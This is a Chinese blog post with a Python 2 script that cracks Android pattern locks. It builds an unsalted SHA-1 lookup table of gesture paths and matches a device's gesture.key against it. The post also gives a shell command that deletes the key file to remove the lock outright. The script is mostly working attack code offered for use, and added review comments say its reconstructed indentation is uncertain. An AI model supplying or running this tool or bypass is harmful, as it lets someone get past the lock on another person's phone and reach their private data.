其实最早看到关于破解访问图案是在看雪的一篇文章中:http://bbs.pediy.com/showthread.php?t=166933。详细信息可以参考这篇文章,至于有什么不明白的那就去Google吧。
今天看到一份代码,用于生成哈希库,既然数据都有了,还不直接把搜索功能一块加进去?这不是蛋疼嘛。于是我自己完善了一下,可以直接用来对gesture.key进行搜索,免得自己去查找。当然了如果愿意自己去查也是很快的,生成的就是个文本数据库,直接用记事本打开查就行了。
当然这个方法也有局限性:前提是设备已开启USB调试,并且能够访问设备上的文件(读取 /data/system 下的文件通常还需要 root 权限)。如果不想去破解,更简单的方法是执行下面的指令直接将文件删除,密码自然也就没了:
rm /data/system/gesture.key
脚本代码如下:
#coding:utf-8
#"============================================="
#"[*]Android lockscreen(gesture) cracker"
#"[*]Updated by obaby QQ:289090351"
#"[*]Mars Information Security"
#"[*]http://www.h4ck.org.cn"
#"[*]coding by g0t3n update by obaby
#"============================================="
#
# What the code below does: every grid point is mapped to one byte
# (0x00-0x08, see key_mapper), the bytes of a path are concatenated and
# hashed with plain SHA-1, and the hex digest is compared with the hex dump
# of the key file.  There is no salt or per-device secret in that
# computation, so the whole table can be generated once and reused -- that
# is the weakness being demonstrated.
#
# NOTE(review): this describes the legacy gesture.key format only; later
# Android releases changed how lockscreen credentials are stored -- confirm
# for the version being assessed.
# NOTE(review): the listing this was restored from had lost its
# indentation; nesting marked NOTE(review) below is the most plausible
# reading and should be checked against the author's copy.
# The script is Python 2 (sha1 over str, str + hex concatenation);
# single-argument print(...) behaves the same as the print statement there.
import sys
import os
import hashlib
import struct
import binascii
from copy import deepcopy

# Write handle for the table file; assigned in the __main__ block and used
# by writelog().
filehandle = None
# Table file: one "path | sha1hex" line per generated path.
db = "./hash.db"
# Empty 3x3 visited grid (0 = not yet used, 1 = used).
init_mapper = [[0, 0, 0],
               [0, 0, 0],
               [0, 0, 0]]
# Work stack of (visited grid, x, y, path so far) tuples.
mapper_queue = []
# Byte that stands for each grid point when a path is hashed.
key_mapper = [['\x00', '\x01', '\x02'],
              ['\x03', '\x04', '\x05'],
              ['\x06', '\x07', '\x08']]

# (dx, dy) steps tried from the current point, in the order the table is
# generated: the four straight neighbours, the four diagonal neighbours,
# then the eight (1,2)/(2,1) offsets.  No other moves are generated.
_STEP_OFFSETS = (
    (1, 0), (-1, 0), (0, 1), (0, -1),
    (1, 1), (-1, 1), (-1, -1), (1, -1),
    (1, 2), (-1, 2), (1, -2), (-1, -2),
    (2, 1), (2, -1), (-2, -1), (-2, 1),
)


def notfull(mapper):
    """Return True if any cell of the 3x3 grid is non-zero.

    Not called anywhere in this script.
    """
    return any(mapper[x][y] != 0 for x in range(3) for y in range(3))


def canwritelog(mapper):
    """Return True when more than two cells of the 3x3 grid are set to 1.

    Original author's note: a pattern must use more than two and at most
    nine points.
    """
    marked = sum(1 for x in range(3) for y in range(3) if mapper[x][y] == 1)
    return marked > 2


def writelog(tmp, prev):
    """Append one "path | sha1hex" line for the path *prev* to the table.

    prev is a list of (x, y) points; tmp (the visited grid) is accepted but
    not read.  Writes through the module-level filehandle.
    """
    coords = "".join(str(x) + str(y) for x, y in prev)
    raw = "".join(key_mapper[x][y] for x, y in prev)
    filehandle.write(coords + " | " + hashlib.sha1(raw).hexdigest() + '\n')


def generatehashtable():
    """Enumerate paths from each of the nine start points and log them.

    Depth-first walk using mapper_queue as a stack: each popped state is
    extended by every offset in _STEP_OFFSETS that stays on the grid and
    lands on an unused point; the extended path is pushed and, once
    canwritelog() accepts it, written via writelog().
    """
    print("[*]Generate hash.db .........\n[*]Waiting...............")
    rounds = 1  # bookkeeping only; the value is never read
    for startxs in range(3):
        for startys in range(3):
            first = deepcopy(init_mapper)
            first[startxs][startys] = 1
            # Seeding the stack with the start state is equivalent to the
            # special-cased first pass of the original loop.
            mapper_queue.append((first, startxs, startys,
                                 [(startxs, startys)]))
            while mapper_queue:
                grid, cx, cy, trail = mapper_queue.pop()
                for dx, dy in _STEP_OFFSETS:
                    nx, ny = cx + dx, cy + dy
                    if not (0 <= nx < 3 and 0 <= ny < 3):
                        continue
                    # A point that is already used ends this branch; it is
                    # not pushed again.
                    if grid[nx][ny] == 1:
                        continue
                    nxt = deepcopy(grid)
                    nxt[nx][ny] = 1
                    longer = trail + [(nx, ny)]
                    mapper_queue.append((nxt, nx, ny, longer))
                    # NOTE(review): logging is taken to be nested under the
                    # "point not yet used" check.
                    if canwritelog(nxt):
                        writelog(nxt, longer)
                rounds += 1
    print("finished...")


def cur_file_dir():
    """Return the directory the script runs from, based on sys.path[0].

    If sys.path[0] is a directory it is returned as is (plain script); if
    it is a file (the author mentions py2exe builds) its directory is
    returned.  Returns None when it is neither.
    """
    base = sys.path[0]
    if os.path.isdir(base):
        return base
    if os.path.isfile(base):
        return os.path.dirname(base)


def printkeytable():
    """Print the legend that maps the two-digit path entries to grid cells."""
    for row in (
        "[*]Fallow the map below to enter the device:",
        "[*]====================",
        "[*]=00 01 02 | o o o=",
        "[*]=10 11 12 | o o o=",
        "[*]=20 21 22 | o o o=",
        "[*]====================",
    ):
        print(row)


def decrypthash():
    """Look up the key file named in sys.argv[1] in the table file.

    The key file is read as raw bytes from the script directory, hex
    encoded, and every table line containing that hex string is printed
    together with the grid legend.  The path is joined with a literal
    backslash, so the lookup as written is Windows-specific.
    """
    print("[*]Hash database detected.")
    if len(sys.argv) < 2:
        print("[*]Please run the script file with key file name .")
        return
    keypath = cur_file_dir() + '\\' + sys.argv[1]
    if not os.path.isfile(keypath):
        return
    print("[*]Get key information now......")
    keyhandle = open(keypath, 'rb')
    gesturetext = binascii.b2a_hex(keyhandle.read())
    print("[*]Crypted hash is :\n " + gesturetext)
    print("[*]Decoding now.....................")
    keyhandle.close()
    table = open(db, 'r')
    for line in table:
        if gesturetext in line:
            print("[*]Sucess cracked the gesture:")
            print(line)
            printkeytable()
            # NOTE(review): closing rule taken to belong to the match
            # branch.
            print("=============================================")
    table.close()


if __name__ == '__main__':
    for banner in (
        "=============================================",
        "[*]Android lockscreen(gesture) cracker",
        "[*]Updated by obaby QQ:289090351",
        "[*]Mars Information Security",
        "[*]http://www.h4ck.org.cn",
        "[*]Thx tog0t3n for his/her orginal script",
        "=============================================",
        "[*]Detect if hash database is exists.....",
    ):
        print(banner)
    if not os.path.isfile(db):
        # NOTE(review): this handle is not closed or flushed anywhere in
        # the script before decrypthash() opens the same path for reading.
        filehandle = open(db, 'w')
        generatehashtable()
    decrypthash()
原创文章,转载请注明: 转载自 obaby@mars
本文标题: 《Andoid 图形屏幕锁破解》
本文链接地址: http://h4ck.org.cn/2013/04/andoid-%e5%9b%be%e5%bd%a2%e5%b1%8f%e5%b9%95%e9%94%81%e7%a0%b4%e8%a7%a3/